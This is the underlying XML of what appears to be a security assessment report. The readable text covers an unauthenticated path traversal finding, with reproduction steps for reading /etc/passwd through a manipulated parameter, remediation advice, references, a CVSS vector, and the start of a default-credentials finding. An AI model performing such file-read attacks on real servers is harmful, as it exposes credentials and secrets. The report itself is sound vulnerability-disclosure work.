                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1022: Restrict File and Directory Permissions</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="10C4C16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E7C585F" w14:textId="6A634DA4">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DEE65FC" w14:textId="7B074115">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4B2F37C" w14:textId="3EE25176">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="6143CFDE" w:rsidP="0D325B6E" w:rsidRDefault="6143CFDE" w14:paraId="1EA39EA0" w14:textId="1C9081C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74F9495" w:rsidP="0D325B6E" w:rsidRDefault="074F9495" w14:paraId="6D95F68E" w14:textId="2218C3D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74F9495">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6B9AB1DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unauthenticated</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="074F949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0434BF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">user can read arbitrary files from the machine’s file system without </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="241BDBC2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0DECC472">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the API endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4051A19C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or URL parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0DECC472">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49602356" w14:textId="06E90706">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143CFDE" w:rsidP="0D325B6E" w:rsidRDefault="6143CFDE" w14:paraId="431E74F9" w14:textId="32D69FCF">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6143CFD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4F59098" w:rsidP="0D325B6E" w:rsidRDefault="24F59098" w14:paraId="724B99CB" w14:textId="09F6B082">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="24F59098">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exploit this vulnerability to access sensitive information including user credentials, application secrets, system configuration files, and backend code as an unauthenticated user. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="272872BF" w14:textId="5BBA6E73">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6143CFDE" w:rsidP="0D325B6E" w:rsidRDefault="6143CFDE" w14:paraId="615DF112" w14:textId="1F1415E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143CFDE" w:rsidP="0D325B6E" w:rsidRDefault="6143CFDE" w14:paraId="7C60E195" w14:textId="69C5A54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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6143CFDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6143CFDE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the website</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52235F49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and view the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52235F49">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endpoint or URL parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52235F49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that loads the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52235F49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="52235F49">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52235F49">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="6143CFDE" w:rsidP="0D325B6E" w:rsidRDefault="6143CFDE" w14:paraId="3951B24E" w14:textId="7060D73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Manipulate</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 xml:space="preserve"> the parameter to read a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sensitive</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 xml:space="preserve"> file from the operating system using path traversal characters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 and read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etc</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/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7CCEDEEE" w:rsidP="0D325B6E" w:rsidRDefault="7CCEDEEE" w14:paraId="04D3DE9A" w14:textId="0911852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 xml:space="preserve">tep 3: Send the request to the modified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endpoint</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 xml:space="preserve"> and view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th</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at the contents of /</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etc</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7CCEDEEE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/passwd file are returned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="2B6E3D2F" w14:textId="5947E1C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99E3B28" w14:textId="3B549089">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143CFDE" w:rsidP="0D325B6E" w:rsidRDefault="6143CFDE" w14:paraId="4EB5B7A2" w14:textId="0C1AFFC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5AC9AE5" w:rsidP="0D325B6E" w:rsidRDefault="25AC9AE5" w14:paraId="2FB2A62A" w14:textId="1A3F39F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5AC9AE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5AC9AE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9186FA5" w:rsidP="0D325B6E" w:rsidRDefault="19186FA5" w14:paraId="6939F823" w14:textId="2482216D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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186FA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Require user authentication on any endpoint that reads internal files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="19186FA5" w:rsidP="0D325B6E" w:rsidRDefault="19186FA5" w14:paraId="0165B186" w14:textId="5AD80B25">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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186FA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Deny absolute paths and any path </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="19186FA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>containing</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="19186FA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> traversal sequences </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="19186FA5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(..) if the API should not be able to read sensitive internal files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="45DF7CB7" w:rsidP="0D325B6E" w:rsidRDefault="45DF7CB7" w14:paraId="0788C5B5" w14:textId="5CE80D1F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>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DF7CB7">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file access to known safe directories. This prevents traversal to sensitive system files and directories.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="17F10E31" w14:textId="1D09E287">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143CFDE" w:rsidP="0D325B6E" w:rsidRDefault="6143CFDE" w14:paraId="22B1A13D" w14:textId="0DE15834">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3CFD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D3F1312" w:rsidP="0D325B6E" w:rsidRDefault="4D3F1312" w14:paraId="0F306DE3" w14:textId="1F8EB449">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R66b92abe06fd47d0">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4D3F1312">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OWASP - Path Traversal</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="4D3F1312" w:rsidP="0D325B6E" w:rsidRDefault="4D3F1312" w14:paraId="2325BF93" w14:textId="3B54E980">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R1eae23edd66e4511">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4D3F1312">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PortSwigger - What is directory traversal?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="35BF867C" w14:textId="38875987">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BC09876" w14:textId="61BF46F5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="66D4E619" w14:textId="47C5F4F3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="76F71950" w:rsidP="0D325B6E" w:rsidRDefault="76F71950" w14:paraId="2985311C" w14:textId="32B67FB7">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589419931" w:id="807103583"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="76F71950">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FFC000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="76F71950">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>M1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc844210291" w:id="777019859"/>
      <w:bookmarkStart w:name="_Toc29659896" w:id="439200583"/>
      <w:bookmarkStart w:name="_Toc31505485" w:id="1655255034"/>
      <w:bookmarkStart w:name="_Toc229248705" w:id="1709700470"/>
      <w:bookmarkStart w:name="_Toc540844951" w:id="651655444"/>
      <w:bookmarkStart w:name="_Toc241509952" w:id="1279761760"/>
      <w:bookmarkStart w:name="_Toc1510044621" w:id="519516820"/>
      <w:bookmarkStart w:name="_Toc1471458879" w:id="672430406"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0E5E8C67">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Default Credentials</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4A5B84AE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="42FB9CB9">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4A5B84AE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">eb </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="67B3EED6">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4A5B84AE">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pplications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="777019859"/>
      <w:bookmarkEnd w:id="439200583"/>
      <w:bookmarkEnd w:id="1655255034"/>
      <w:bookmarkEnd w:id="1709700470"/>
      <w:bookmarkEnd w:id="651655444"/>
      <w:bookmarkEnd w:id="1279761760"/>
      <w:bookmarkEnd w:id="519516820"/>
      <w:bookmarkEnd w:id="672430406"/>
      <w:bookmarkEnd w:id="80710358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6963E09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14C59F" w14:textId="6BF5765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CBD1B7" w14:textId="16A062C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C2E5BBE" w14:textId="514C788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29C4AA9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6FD1FD" w14:textId="2117B98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415B8EA" w14:textId="21F00410">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613A37D5" w:rsidP="0D325B6E" w:rsidRDefault="613A37D5" w14:paraId="3CC3CAFB" w14:textId="7D4E7286">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="613A37D5">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>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C33EF85" w14:textId="55629336">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250CFF2C">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012BFFC" w14:textId="1A48087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08EF3F93" w14:textId="103520FD">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01417CF8"/>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880175E"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="50FCD8B2">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425E1F" w14:textId="63CC697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7574259" w:rsidP="0D325B6E" w:rsidRDefault="57574259" w14:paraId="3CE10230" w14:textId="615D00FD">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink w:anchor="CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" r:id="R2fbf03b75a5449b4">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="57574259">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AV:N/AC:L/</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2EDA05CE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/S</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="57574259">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>A:N</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="73E61F66">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71DC247" w14:textId="4C09350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CE7F031" w:rsidP="0D325B6E" w:rsidRDefault="7CE7F031" w14:paraId="7E57E66D" w14:textId="4C19CF8A">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidR="7CE7F031">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75D32A7" w14:textId="222BBA6B">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R62abb4d7f76b4e6f">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1A018480">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>078</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="3D196A33">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>:</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1A018480">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t xml:space="preserve"> Valid Accounts</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
